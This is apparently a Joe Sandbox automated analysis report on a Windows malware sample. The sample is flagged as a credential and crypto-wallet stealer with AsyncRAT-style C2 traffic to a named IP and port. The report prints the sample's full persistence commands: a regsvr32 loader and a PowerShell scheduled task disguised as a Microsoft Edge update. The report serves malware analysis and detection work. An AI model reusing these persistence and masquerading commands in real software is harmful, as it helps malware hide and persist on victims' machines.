Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
8n26gvrXUM.exe

Overview

General Information

Sample name:8n26gvrXUM.exe
Analysis ID:1583336
MD5:c6f9f0ec394a72fb302efbcf74da2ea7
SHA1:143c8fe025fbfd0afe9c88003315bc5a4720439a
SHA256:0a63068ec9d94fef476d9e906fb4920de32e70b77daa24a8b2a0786f23889a1a
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Powershell launch regsvr32
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
.NET source code contains very large array initializations
Found many strings related to Crypto-Wallets (likely being stolen)
Loading BitLocker PowerShell Module
Queries memory information (via WMI often done to detect virtual machines)
Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive physical memory information (via WMI, Win32_PhysicalMemory, often done to detect virtual machines)
Sets debug register (to hijack the execution of another thread)
Sigma detected: Potentially Suspicious Child Process Of Regsvr32
Suspicious powershell command line found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Bitcoin Wallet information
Uses Register-ScheduledTask to add task schedules
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to call native functions
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Queries keyboard layouts
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Network Connection Initiated By Regsvr32.EXE
Sigma detected: Potential Regsvr32 Commandline Flag Anomaly
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer

Classification

  • System is w10x64native
  • 8n26gvrXUM.exe (PID: 8948 cmdline: "C:\Users\user\Desktop\8n26gvrXUM.exe" MD5: C6F9F0EC394A72FB302EFBCF74DA2EA7)
    • 8n26gvrXUM.tmp (PID: 8968 cmdline: "C:\Users\user\AppData\Local\Temp\is-MPMS8.tmp\8n26gvrXUM.tmp" /SL5="$103F0,1083099,161792,C:\Users\user\Desktop\8n26gvrXUM.exe" MD5: BCC236A3921E1388596A42B05686FF5E)
      • cmd.exe (PID: 9040 cmdline: "cmd.exe" /C timeout /T 3 & "C:\Users\user\Desktop\8n26gvrXUM.exe" /VERYSILENT /SUPPRESSMSGBOXES MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 9048 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
        • timeout.exe (PID: 9096 cmdline: timeout /T 3 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
        • 8n26gvrXUM.exe (PID: 7040 cmdline: "C:\Users\user\Desktop\8n26gvrXUM.exe" /VERYSILENT /SUPPRESSMSGBOXES MD5: C6F9F0EC394A72FB302EFBCF74DA2EA7)
          • 8n26gvrXUM.tmp (PID: 8252 cmdline: "C:\Users\user\AppData\Local\Temp\is-DN23D.tmp\8n26gvrXUM.tmp" /SL5="$30432,1083099,161792,C:\Users\user\Desktop\8n26gvrXUM.exe" /VERYSILENT /SUPPRESSMSGBOXES MD5: BCC236A3921E1388596A42B05686FF5E)
            • regsvr32.exe (PID: 8328 cmdline: "regsvr32.exe" /s /i:SYNC "C:\Users\user\AppData\Roaming\\netapi32_1.drv" MD5: 878E47C8656E53AE8A8A21E927C6F7E0)
              • regsvr32.exe (PID: 8364 cmdline: /s /i:SYNC "C:\Users\user\AppData\Roaming\\netapi32_1.drv" MD5: B0C2FA35D14A9FAD919E99D9D75E1B9E)
                • powershell.exe (PID: 8472 cmdline: "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:SYNC C:\Users\user\AppData\Roaming\netapi32_1.drv' }) { exit 0 } else { exit 1 }" MD5: 04029E121A0CFA5991749937DD22A1D9)
                  • conhost.exe (PID: 8532 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
                • powershell.exe (PID: 7648 cmdline: "powershell" "Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute \"regsvr32\" -Argument \"/S /i:SYNC C:\Users\user\AppData\Roaming\netapi32_1.drv\") -Trigger (New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(1) -RepetitionInterval (New-TimeSpan -Minutes 1)) -TaskName 'MicrosoftEdgeUpdateTaskMachineUA{5AA590E8-E6D2-49AB-E5B8-6BCEE32CF7C9}' -Description 'MicrosoftEdgeUpdateTaskMachineUA' -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries -ExecutionTimeLimit 0) -RunLevel Highest" MD5: 04029E121A0CFA5991749937DD22A1D9)
                  • conhost.exe (PID: 728 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
  • regsvr32.exe (PID: 8808 cmdline: C:\Windows\system32\regsvr32.EXE /S /i:SYNC C:\Users\user\AppData\Roaming\netapi32_1.drv MD5: B0C2FA35D14A9FAD919E99D9D75E1B9E)
    • powershell.exe (PID: 5884 cmdline: "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:SYNC C:\Users\user\AppData\Roaming\netapi32_1.drv' }) { exit 0 } else { exit 1 }" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 3560 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
  • svchost.exe (PID: 8960 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: F586835082F632DC8D9404D83BC16316)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
0000000E.00000002.2137187188.00000000033D8000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    Process Memory Space: regsvr32.exe PID: 8808JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security

      System Summary

      barindex
      Source: Process startedAuthor: elhoim, Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:SYNC C:\Users\user\AppData\Roaming\netapi32_1.drv' }) { exit 0 } else { exit 1 }", CommandLine: "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:SYNC C:\Users\user\AppData\Roaming\netapi32_1.drv' }) { exit 0 } else { exit 1 }", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: /s /i:SYNC "C:\Users\user\AppData\Roaming\\netapi32_1.drv", ParentImage: C:\Windows\System32\regsvr32.exe, ParentProcessId: 8364, ParentProcessName: regsvr32.exe, ProcessCommandLine: "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:SYNC C:\Users\user\AppData\Roaming\netapi32_1.drv' }) { exit 0 } else { exit 1 }", ProcessId: 8472, ProcessName: powershell.exe
      Source: Network ConnectionAuthor: Dmitriy Lifanov, oscd.community: Data: DestinationIp: 144.202.34.112, DestinationIsIpv6: false, DestinationPort: 56001, EventID: 3, Image: C:\Windows\System32\regsvr32.exe, Initiated: true, ProcessId: 8808, Protocol: tcp, SourceIp: 192.168.11.20, SourceIsIpv6: false, SourcePort: 49715
      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "regsvr32.exe" /s /i:SYNC "C:\Users\user\AppData\Roaming\\netapi32_1.drv", CommandLine: "regsvr32.exe" /s /i:SYNC "C:\Users\user\AppData\Roaming\\netapi32_1.drv", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\regsvr32.exe, NewProcessName: C:\Windows\SysWOW64\regsvr32.exe, OriginalFileName: C:\Windows\SysWOW64\regsvr32.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\is-DN23D.tmp\8n26gvrXUM.tmp" /SL5="$30432,1083099,161792,C:\Users\user\Desktop\8n26gvrXUM.exe" /VERYSILENT /SUPPRESSMSGBOXES, ParentImage: C:\Users\user\AppData\Local\Temp\is-DN23D.tmp\8n26gvrXUM.tmp, ParentProcessId: 8252, ParentProcessName: 8n26gvrXUM.tmp, ProcessCommandLine: "regsvr32.exe" /s /i:SYNC "C:\Users\user\AppData\Roaming\\netapi32_1.drv", ProcessId: 8328, ProcessName: regsvr32.exe
      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:SYNC C:\Users\user\AppData\Roaming\netapi32_1.drv' }) { exit 0 } else { exit 1 }", CommandLine: "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:SYNC C:\Users\user\AppData\Roaming\netapi32_1.drv' }) { exit 0 } else { exit 1 }", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: /s /i:SYNC "C:\Users\user\AppData\Roaming\\netapi32_1.drv", ParentImage: C:\Windows\System32\regsvr32.exe, ParentProcessId: 8364, ParentProcessName: regsvr32.exe, ProcessCommandLine: "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:SYNC C:\Users\user\AppData\Roaming\netapi32_1.drv' }) { exit 0 } else { exit 1 }", ProcessId: 8472, ProcessName: powershell.exe
      Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 908, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 8960, ProcessName: svchost.exe

      HIPS / PFW / Operating System Protection Evasion

      barindex
      Source: Process startedAuthor: Joe Security: Data: Command: "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:SYNC C:\Users\user\AppData\Roaming\netapi32_1.drv' }) { exit 0 } else { exit 1 }", CommandLine: "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:SYNC C:\Users\user\AppData\Roaming\netapi32_1.drv' }) { exit 0 } else { exit 1 }", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: /s /i:SYNC "C:\Users\user\AppData\Roaming\\netapi32_1.drv", ParentImage: C:\Windows\System32\regsvr32.exe, ParentProcessId: 8364, ParentProcessName: regsvr32.exe, ProcessCommandLine: "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:SYNC C:\Users\user\AppData\Roaming\netapi32_1.drv' }) { exit 0 } else { exit 1 }", ProcessId: 8472, ProcessName: powershell.exe
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2025-01-02T14:08:46.826838+010020355951Domain Observed Used for C2 Detected144.202.34.11256001192.168.11.2049715TCP

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Source: C:\Users\user\AppData\Roaming\is-J08NI.tmpReversingLabs: Detection: 43%
      Source: C:\Users\user\AppData\Roaming\netapi32_1.drv (copy)ReversingLabs: Detection: 43%
      Source: 8n26gvrXUM.exeReversingLabs: Detection: 50%
      Source: 8n26gvrXUM.exeVirustotal: Detection: 55%Perma Link
      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_00007FFD348FA1B0 BCryptGenRandom,SystemFunction036,9_2_00007FFD348FA1B0
      Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_00007FFD348FA1B0 BCryptGenRandom,SystemFunction036,14_2_00007FFD348FA1B0
      Source: 8n26gvrXUM.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
      Source: Binary string: c:\zlib-dll\Release\isunzlib.pdb source: 8n26gvrXUM.tmp, 00000001.00000002.928756353.0000000002393000.00000002.00000001.01000000.00000006.sdmp, 8n26gvrXUM.tmp, 00000001.00000003.884415031.0000000003370000.00000004.00001000.00020000.00000000.sdmp, 8n26gvrXUM.tmp, 00000007.00000003.922467829.00000000036C8000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.1.dr, _isdecmp.dll.7.dr

      Networking

      barindex
      Source: Network trafficSuricata IDS: 2035595 - Severity 1 - ET MALWARE Generic AsyncRAT Style SSL Cert : 144.202.34.112:56001 -> 192.168.11.20:49715
      Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 144.202.34.112 56001
      Source: global trafficTCP traffic: 192.168.11.20:49715 -> 144.202.34.112:56001
      Source: Joe Sandbox ViewASN Name: AS-CHOOPAUS AS-CHOOPAUS
      Source: unknownTCP traffic detected without corresponding DNS query: 144.202.34.112
      Source: unknownTCP traffic detected without corresponding DNS query: 144.202.34.112
      Source: unknownTCP traffic detected without corresponding DNS query: 144.202.34.112
      Source: unknownTCP traffic detected without corresponding DNS query: 144.202.34.112
      Source: unknownTCP traffic detected without corresponding DNS query: 144.202.34.112
      Source: unknownTCP traffic detected without corresponding DNS query: 144.202.34.112
      Source: unknownTCP traffic detected without corresponding DNS query: 144.202.34.112
      Source: unknownTCP traffic detected without corresponding DNS query: 144.202.34.112
      Source: unknownTCP traffic detected without corresponding DNS query: 144.202.34.112
      Source: unknownTCP traffic detected without corresponding DNS query: 144.202.34.112
      Source: unknownTCP traffic detected without corresponding DNS query: 144.202.34.112
      Source: unknownTCP traffic detected without corresponding DNS query: 144.202.34.112
      Source: unknownTCP traffic detected without corresponding DNS query: 144.202.34.112
      Source: unknownTCP traffic detected without corresponding DNS query: 144.202.34.112
      Source: unknownTCP traffic detected without corresponding DNS query: 144.202.34.112
      Source: unknownTCP traffic detected without corresponding DNS query: 144.202.34.112
      Source: unknownTCP traffic detected without corresponding DNS query: 144.202.34.112
      Source: unknownTCP traffic detected without corresponding DNS query: 144.202.34.112
      Source: unknownTCP traffic detected without corresponding DNS query: 144.202.34.112
      Source: unknownTCP traffic detected without corresponding DNS query: 144.202.34.112
      Source: unknownTCP traffic detected without corresponding DNS query: 144.202.34.112
      Source: unknownTCP traffic detected without corresponding DNS query: 144.202.34.112
      Source: unknownTCP traffic detected without corresponding DNS query: 144.202.34.112
      Source: unknownTCP traffic detected without corresponding DNS query: 144.202.34.112
      Source: unknownTCP traffic detected without corresponding DNS query: 144.202.34.112
      Source: unknownTCP traffic detected without corresponding DNS query: 144.202.34.112
      Source: unknownTCP traffic detected without corresponding DNS query: 144.202.34.112
      Source: unknownTCP traffic detected without corresponding DNS query: 144.202.34.112
      Source: unknownTCP traffic detected without corresponding DNS query: 144.202.34.112
      Source: unknownTCP traffic detected without corresponding DNS query: 144.202.34.112
      Source: unknownTCP traffic detected without corresponding DNS query: 144.202.34.112
      Source: unknownTCP traffic detected without corresponding DNS query: 144.202.34.112
      Source: unknownTCP traffic detected without corresponding DNS query: 144.202.34.112
      Source: unknownTCP traffic detected without corresponding DNS query: 144.202.34.112
      Source: unknownTCP traffic detected without corresponding DNS query: 144.202.34.112
      Source: unknownTCP traffic detected without corresponding DNS query: 144.202.34.112
      Source: 8n26gvrXUM.tmp, 00000007.00000002.923923964.000000000018F000.00000004.00000010.00020000.00000000.sdmp, 8n26gvrXUM.tmp, 00000007.00000003.922467829.000000000366E000.00000004.00001000.00020000.00000000.sdmp, is-J08NI.tmp.7.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDCA-1.crt0
      Source: 8n26gvrXUM.tmp, 00000007.00000002.923923964.000000000018F000.00000004.00000010.00020000.00000000.sdmp, 8n26gvrXUM.tmp, 00000007.00000003.922467829.000000000366E000.00000004.00001000.00020000.00000000.sdmp, is-J08NI.tmp.7.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
      Source: 8n26gvrXUM.tmp, 00000007.00000002.923923964.000000000018F000.00000004.00000010.00020000.00000000.sdmp, 8n26gvrXUM.tmp, 00000007.00000003.922467829.000000000366E000.00000004.00001000.00020000.00000000.sdmp, is-J08NI.tmp.7.drString found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceCodeSigningCA-1.crt0
      Source: 8n26gvrXUM.tmp, 00000007.00000002.923923964.000000000018F000.00000004.00000010.00020000.00000000.sdmp, 8n26gvrXUM.tmp, 00000007.00000003.922467829.000000000366E000.00000004.00001000.00020000.00000000.sdmp, is-J08NI.tmp.7.drString found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0
      Source: powershell.exe, 0000000A.00000002.968534001.0000026677F96000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1139170748.00000293F3A9C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.1588032598.000000001BB8E000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000002.2141694370.000000001BB8F000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1131585737.00000208F6490000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.2139657410.000001C713902000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
      Source: powershell.exe, 0000000A.00000002.968534001.0000026677F96000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1139170748.00000293F3A50000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.1588032598.000000001BB8E000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000002.2141694370.000000001BB8F000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1131585737.00000208F6460000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.2139657410.000001C713902000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
      Source: powershell.exe, 0000000F.00000002.1135113573.00000208F6821000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoft.c
      Source: svchost.exe, 00000011.00000002.2138830717.000001C713847000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
      Source: 8n26gvrXUM.tmp, 00000007.00000002.923923964.000000000018F000.00000004.00000010.00020000.00000000.sdmp, 8n26gvrXUM.tmp, 00000007.00000003.922467829.000000000366E000.00000004.00001000.00020000.00000000.sdmp, is-J08NI.tmp.7.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDCA-1.crl08
      Source: 8n26gvrXUM.tmp, 00000007.00000002.923923964.000000000018F000.00000004.00000010.00020000.00000000.sdmp, 8n26gvrXUM.tmp, 00000007.00000003.922467829.000000000366E000.00000004.00001000.00020000.00000000.sdmp, is-J08NI.tmp.7.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0:
      Source: 8n26gvrXUM.tmp, 00000007.00000002.923923964.000000000018F000.00000004.00000010.00020000.00000000.sdmp, 8n26gvrXUM.tmp, 00000007.00000003.922467829.000000000366E000.00000004.00001000.00020000.00000000.sdmp, is-J08NI.tmp.7.drString found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
      Source: 8n26gvrXUM.tmp, 00000007.00000002.923923964.000000000018F000.00000004.00000010.00020000.00000000.sdmp, 8n26gvrXUM.tmp, 00000007.00000003.922467829.000000000366E000.00000004.00001000.00020000.00000000.sdmp, is-J08NI.tmp.7.drString found in binary or memory: http://crl3.digicert.com/ha-cs-2011a.crl0.
      Source: 8n26gvrXUM.tmp, 00000007.00000002.923923964.000000000018F000.00000004.00000010.00020000.00000000.sdmp, 8n26gvrXUM.tmp, 00000007.00000003.922467829.000000000366E000.00000004.00001000.00020000.00000000.sdmp, is-J08NI.tmp.7.drString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDCA-1.crl0w
      Source: 8n26gvrXUM.tmp, 00000007.00000002.923923964.000000000018F000.00000004.00000010.00020000.00000000.sdmp, 8n26gvrXUM.tmp, 00000007.00000003.922467829.000000000366E000.00000004.00001000.00020000.00000000.sdmp, is-J08NI.tmp.7.drString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0
      Source: 8n26gvrXUM.tmp, 00000007.00000002.923923964.000000000018F000.00000004.00000010.00020000.00000000.sdmp, 8n26gvrXUM.tmp, 00000007.00000003.922467829.000000000366E000.00000004.00001000.00020000.00000000.sdmp, is-J08NI.tmp.7.drString found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
      Source: 8n26gvrXUM.tmp, 00000007.00000002.923923964.000000000018F000.00000004.00000010.00020000.00000000.sdmp, 8n26gvrXUM.tmp, 00000007.00000003.922467829.000000000366E000.00000004.00001000.00020000.00000000.sdmp, is-J08NI.tmp.7.drString found in binary or memory: http://crl4.digicert.com/ha-cs-2011a.crl0L
      Source: regsvr32.exe, 0000000E.00000002.2141520016.000000001BAF0000.00000004.00000020.00020000.00000000.sdmp, 77EC63BDA74BD0D0E0426DC8F8008506.14.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
      Source: regsvr32.exe, 0000000E.00000002.2141520016.000000001BB1E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?a1ee8ab1c36b1
      Source: regsvr32.exe, 0000000E.00000003.1588032598.000000001BBC4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabV
      Source: regsvr32.exe, 0000000E.00000002.2141520016.000000001BB1E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en89
      Source: edb.log.17.dr, qmgr.db.17.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/update2/actxsdodvxbjblyjfcbcbc7srcwa_1.3.36.242/GoogleUpda
      Source: powershell.exe, 0000000A.00000002.945864209.000002660148C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.963153072.0000026610078000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1095561017.0000029390077000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.997278136.000002938149C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1110863403.0000020890077000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1026201200.0000020881496000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
      Source: 8n26gvrXUM.tmp, 00000007.00000002.923923964.000000000018F000.00000004.00000010.00020000.00000000.sdmp, 8n26gvrXUM.tmp, 00000007.00000003.922467829.000000000366E000.00000004.00001000.00020000.00000000.sdmp, is-J08NI.tmp.7.drString found in binary or memory: http://ocsp.digicert.com0A
      Source: 8n26gvrXUM.tmp, 00000007.00000002.923923964.000000000018F000.00000004.00000010.00020000.00000000.sdmp, 8n26gvrXUM.tmp, 00000007.00000003.922467829.000000000366E000.00000004.00001000.00020000.00000000.sdmp, is-J08NI.tmp.7.drString found in binary or memory: http://ocsp.digicert.com0C
      Source: 8n26gvrXUM.tmp, 00000007.00000002.923923964.000000000018F000.00000004.00000010.00020000.00000000.sdmp, 8n26gvrXUM.tmp, 00000007.00000003.922467829.000000000366E000.00000004.00001000.00020000.00000000.sdmp, is-J08NI.tmp.7.drString found in binary or memory: http://ocsp.digicert.com0I
      Source: 8n26gvrXUM.tmp, 00000007.00000002.923923964.000000000018F000.00000004.00000010.00020000.00000000.sdmp, 8n26gvrXUM.tmp, 00000007.00000003.922467829.000000000366E000.00000004.00001000.00020000.00000000.sdmp, is-J08NI.tmp.7.drString found in binary or memory: http://ocsp.digicert.com0P
      Source: powershell.exe, 0000000A.00000002.945864209.000002660022C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.997278136.000002938022D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1145750310.00000293F4118000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1026201200.000002088022C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
      Source: powershell.exe, 0000000A.00000002.945864209.000002660022C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.997278136.000002938022D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1026201200.000002088022C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.pngXz
      Source: qmgr.db.17.drString found in binary or memory: http://r4---sn-5hnekn7k.gvt1.com/edgedl/release2/chrome/acb3kitere6jimdp6rrtasanb2aq_93.0.4577.82/93
      Source: 8n26gvrXUM.tmp, 00000007.00000002.923923964.000000000018F000.00000004.00000010.00020000.00000000.sdmp, is-J08NI.tmp.7.drString found in binary or memory: http://rb.symcb.com/rb.crl0W
      Source: 8n26gvrXUM.tmp, 00000007.00000002.923923964.000000000018F000.00000004.00000010.00020000.00000000.sdmp, is-J08NI.tmp.7.drString found in binary or memory: http://rb.symcb.com/rb.crt0
      Source: 8n26gvrXUM.tmp, 00000007.00000002.923923964.000000000018F000.00000004.00000010.00020000.00000000.sdmp, is-J08NI.tmp.7.drString found in binary or memory: http://rb.symcd.com0&
      Source: qmgr.db.17.drString found in binary or memory: http://redirector.gvt1.com/edgedl/release2/chrome/acb3kitere6jimdp6rrtasanb2aq_93.0.4577.82/93.0.457
      Source: qmgr.db.17.drString found in binary or memory: http://redirector.gvt1.com/edgedl/release2/chrome_component/aciwgjnovhktokhzyboslawih45a_2700/jflook
      Source: qmgr.db.17.drString found in binary or memory: http://redirector.gvt1.com/edgedl/release2/chrome_component/acze3h5f67uhtnjsyv6pabzn277q_298/lmelgle
      Source: qmgr.db.17.drString found in binary or memory: http://redirector.gvt1.com/edgedl/release2/chrome_component/dp66roauucji6olf7ycwe24lea_6869/hfnkpiml
      Source: 8n26gvrXUM.tmp, 00000007.00000002.923923964.000000000018F000.00000004.00000010.00020000.00000000.sdmp, is-J08NI.tmp.7.drString found in binary or memory: http://s.symcb.com/universal-root.crl0
      Source: 8n26gvrXUM.tmp, 00000007.00000002.923923964.000000000018F000.00000004.00000010.00020000.00000000.sdmp, is-J08NI.tmp.7.drString found in binary or memory: http://s.symcd.com0
      Source: 8n26gvrXUM.tmp, 00000007.00000002.923923964.000000000018F000.00000004.00000010.00020000.00000000.sdmp, is-J08NI.tmp.7.drString found in binary or memory: http://s.symcd.com06
      Source: powershell.exe, 0000000C.00000002.1145750310.00000293F4143000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.microsoft.co
